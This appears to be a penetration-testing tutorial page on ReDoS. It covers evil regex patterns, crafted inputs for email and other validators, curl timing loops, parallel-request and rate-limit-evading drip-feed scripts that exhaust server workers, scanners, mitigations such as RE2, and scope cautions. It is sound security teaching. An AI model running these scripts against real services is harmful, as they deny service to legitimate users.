Skip to content

ReDoS

Some regex patterns trigger catastrophic backtracking on inputs that almost-but-don’t-quite match. A 50-character crafted string can lock a regex engine for seconds, minutes, or forever - denial of service from a single HTTP request. APIs that validate input via regex (email validators, URL validators, format checkers) are the primary surface.

# 1. Identify a regex-validated parameter (response leaks the pattern, error mentions regex,
# or it's a documented format check like email/URL/phone)
curl 'http://target/api/check-email?email=test_value'
→ {"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", ...}
# 2. Look for evil patterns - nested quantifiers, overlapping alternation
# ([a-z]+)+ ← classic
# (a|a)+ ← alternation with overlap
# (a*)* ← nested *
# (.*)*$ ← greedy-everything anchored
# 3. Craft an input that triggers backtracking - usually:
# "string-that-almost-matches" + "character-that-breaks-the-match"
curl 'http://target/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjj@cccccccccccccccc.55555555555555.'
# 4. Observe response time - multi-second hangs indicate ReDoS
time curl '...?email=jjjjjjjj...' # baseline
time curl '[email protected].' # crafted (slow)

Success indicator: response time scales superlinearly with input length - short inputs respond in milliseconds, slightly-longer inputs respond in seconds, slightly-longer-still inputs respond in minutes.

Most regex engines (Perl-compatible, including PHP PCRE, Python re, JavaScript V8, .NET, Ruby) use backtracking to handle ambiguous patterns. When a regex has alternatives or quantifiers, the engine tries one path, and if it doesn’t match, backs up and tries another. For simple patterns this is fast. For patterns with overlapping options, the backtracking can take exponential time.

The “evil regex” class is patterns where the engine has many ways to partially match a string but the full match fails - every partial match has to be tried before the engine concludes “no match.”

^(a+)+$

Try matching aaaaaaaab (8 a’s followed by a b):

  • Engine tries (aaaaaaaa)+ → tries to match $ against b → fails
  • Backtracks: tries (aaaaaaa)(a)+ → tries to match $ against b → fails
  • Backtracks: tries (aaaaaa)(a)(a)+ → tries to match $ against b → fails

For 8 a’s, the engine tries 2⁷ = 128 backtracking paths. For 30 a’s, 2²⁹ ≈ 500 million paths. Each path takes microseconds; cumulatively, seconds-to-minutes.

The trigger: an input where the regex almost matches, requiring full exploration of the backtracking tree before concluding “no match.”

The patterns to spot in source review or leaked-regex responses:

([a-z]+)+
(\d+)*
(.*)*

Anything where a quantified group (+, *, {n,m}) wraps an already-quantified pattern. Each level multiplies the backtracking complexity.

(a|a)*
(ab|a)*b
(x+x+)+y

When an OR alternative can match the same prefix as another, the engine considers all combinations.

Group with greedy quantifier followed by anchor

Section titled “Group with greedy quantifier followed by anchor”
^(\d+)$ # safe - \d is unambiguous
^(.+)*$ # vulnerable - .+ matches anything, * adds another level

The HTB-style example:

^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$

Walking through what makes it vulnerable:

SectionVulnerability
([a-zA-Z0-9_.-])+OK - character class with single +
(([a-zA-Z0-9-])+.)+Nested + - [...]+ inside (...)+. Each domain segment can match in multiple ways.
([a-zA-Z0-9]{2,4})+Quantifier inside quantifier - TLD can be 2-4 chars, group is repeated.

Multiple compounding issues. An attacker-crafted input forces exponential exploration.

Some APIs leak their regex in error responses or schema documents:

GET /api/check-email?email=test_value HTTP/1.1
{
"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/",
"success": false
}

Free win - paste the regex into a vulnerability checker:

For black-box detection, the workflow is:

  1. Identify a format-validated parameter - email, URL, phone, ZIP, IP address. Any parameter where invalid input gets rejected with a “format” error.

  2. Send a baseline valid input and time the response:

    Terminal window
    $ time curl 'http://target/api/[email protected]'
    real 0m0.012s
  3. Send increasingly long crafted inputs and watch for nonlinear response time growth:

    Terminal window
    $ for length in 10 20 30 40 50 60 70; do
    payload=$(python3 -c "print('j'*$length + '@' + 'c'*$length + '.55555.')")
    echo -n "Length $length: "
    time curl -s "http://target/api/check-email?email=$payload" > /dev/null
    done
    Length 10: real 0m0.013s
    Length 20: real 0m0.019s
    Length 30: real 0m0.142s
    Length 40: real 0m2.341s
    Length 50: real 0m38.21s
    Length 60: (timeout)

    Exponential growth in response time confirms catastrophic backtracking.

Without knowing the exact regex, these inputs catch common patterns:

Target formatEvil input template
Email[email protected]. (note trailing dot)
URLhttp://aaaa...aaa.com/aaa...aaa/! (trailing special char)
IPv40.0.0.0.0.0.0.0.0... (extra octets)
Phone1234567890123456789X (overlong + invalid char)
HTML tag<a href="aaa...aaa"> (long attribute value)
Filenameaaa...aaa.aaa.aaa.aaa.zip (multi-dot)
ISO date2023-01-01T12:34:567890123 (overlong time)

The pattern: long valid-looking prefix + character that breaks the final anchor.

Terminal window
$ curl --max-time 60 "http://target/api/check-email?email=$(python3 -c "print('j'*30 + '@' + 'c'*30 + '.5'*30 + '.')")"

While the request is processing, the worker thread is locked. If the server has limited workers (e.g., uWSGI with 4 workers, PHP-FPM with 5 children), 5 concurrent crafted requests lock all workers - service unavailable to legitimate users.

#!/bin/bash
# Fire N parallel requests, each locking one worker
for i in $(seq 1 100); do
curl --max-time 120 "http://target/api/check-email?email=$EVIL_INPUT" &
done
wait

Net effect: 100 worker-minutes consumed per second of attack. Service capacity is exhausted long before bandwidth is.

Instead of obvious flood, drip-feed crafted inputs at a rate just slow enough to evade rate limiters:

Terminal window
while true; do
curl --max-time 60 "http://target/api/check-email?email=$EVIL_INPUT"
sleep 5
done

Each request occupies one worker for ~30-60 seconds. Six workers locked at any time. Service is “available” by uptime metrics but practically unusable. Detection requires the defender to notice worker pool saturation, which is a thinner signal than request flood.

Walking through the source-doc scenario:

Terminal window
$ curl 'http://target:3000/api/check-email?email=test_value'
{"regex": "/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success": false}

The endpoint validates an email. Crucially, the response leaks the regex - no source-code access needed.

Submit to regex101.com for explanation, or visualize at regulex. The visualization shows the nested quantifiers and overlapping character classes.

The pattern needs an input that:

  • Starts with characters matching the first capture group ([a-zA-Z0-9_.-]+)
  • Contains an @
  • Has multiple “domain segments” (each matching [a-zA-Z0-9-]+.)
  • Ends with characters that almost-but-don’t-quite match the TLD class
jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555.

Multiple long groups of j/c/5, terminated with a trailing . that the TLD class can’t accept (because 5555...5. ends with . not an alphanumeric).

Terminal window
$ time curl "http://target:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555."
# (waits 30+ seconds)
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/", "success":false}
real 0m38.42s

The 38-second response time vs. the millisecond baseline confirms ReDoS.

Five workers, each blocked for 30 seconds = 25 seconds of unavailability per attack cycle:

Terminal window
for i in {1..10}; do
curl --max-time 60 "http://target:3000/api/check-email?email=jjjjjjjjjjjjjjjjjjjjjjjjjjjj@ccccccccccccccccccccccccccccc.55555555555555555555555555555555555555555555555555555555." &
done
wait
Terminal window
# Node-based: scan a regex string for catastrophic backtracking risk
$ npm install -g safe-regex
$ echo '/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/' | safe-regex
False
# (False means unsafe)
# Static analyzer for code containing regexes
$ npx eslint --rule 'security/detect-unsafe-regex: error' source.js
# Comprehensive scanner (Java, C#, JS, Python, etc.)
$ recheck check 'pattern_here'

Burp Pro’s “Active Scanner” detects ReDoS in some patterns. Community extensions:

  • ReDoSinator - focused ReDoS testing
  • Backslash Powered Scanner - detects various injection-like behaviors including timing-based regex issues

Wikipedia ReDoS and OWASP ReDoS Cheat Sheet list known evil patterns and their canonical evil inputs. Test these against any format-validated parameter:

PatternEvil input
^(a+)+$aaaa...aaab
(a*)*$aaaa...aaab
^(a|a)+$aaaa...aaab
(a|aa)+$aaaa...aaab
^([a-zA-Z]+)*$XaXaXa...XaXa1
(\.\*?)*..........!
The email regex above[email protected].

When reporting ReDoS, the remediation tells you which targets to skip:

MitigationEffect on attacker
Use a non-backtracking regex engine (Rust regex, Go regexp, RE2)Eliminates the class entirely
Add regex timeout (re2.compile(pattern, timeout=100ms) equivalents)Limits damage; attacker can still trigger 100ms-per-request waste
Replace regex with custom parsingEliminates the regex-specific vector
Input length limitsBounds the worst case
WAF rules for “long input + format mismatch”Partial - can be evaded

Servers using RE2 (Google’s regex library) or Rust’s regex crate are immune to ReDoS by design - these engines guarantee linear-time evaluation. JS V8’s regex is not RE2; neither is Python’s re. PCRE (PHP, Apache rules) is not RE2 either.

Production-scale ReDoS attacks are denial-of-service attacks. Engagement scope and authorization matter:

  • In-scope DoS testing - proceed but document carefully; coordinate with the SRE team to avoid impacting other customers
  • Bug bounty programs - DoS testing usually explicitly out of scope; report the vulnerability (the pattern) without triggering large-scale impact
  • Pentesting - confirm one slow request (proves the vulnerability) without scaling to actual service disruption

The proof-of-concept is one crafted-input response time. Anything beyond that risks causing damage that the engagement may not authorize.

TaskPattern
Spot regex disclosure in API responseField literally named regex, or pattern characters in error string
Visualize a regexregex101.com, regulex (jex.im)
Scan a regex for ReDoS risksafe-regex, recheck
Evil patterns to look for(x+)+, (x|x)+, (x*)*, (.+)*, nested groups with +/*
Evil input patternLong valid-prefix + breaking-character at the end
Baseline timingtime curl 'URL?param=normal_value'
Crafted timingtime curl 'URL?param=EVIL_INPUT'
Scaling for DoS confirmationLoop with increasing length, watch nonlinear time growth
Single-request DoSOne crafted request, observe worker hangs
Amplified DoSN parallel crafted requests, saturate worker pool
Stealthier DoSDrip-feed slow but constant rate
Backtracking-immune enginesRE2 (Go regexp, Rust regex), Hyperscan
Backtracking-vulnerable enginesPCRE (PHP), V8 (JS), re (Python), regex (Ruby), .NET, Java Pattern

For the API-specific context this attack lives in, see the Overview and API vuln context. For the capstone chain combining SOAPAction spoofing + SQL injection, see Skill assessment chain.

Defenses D3-RAPA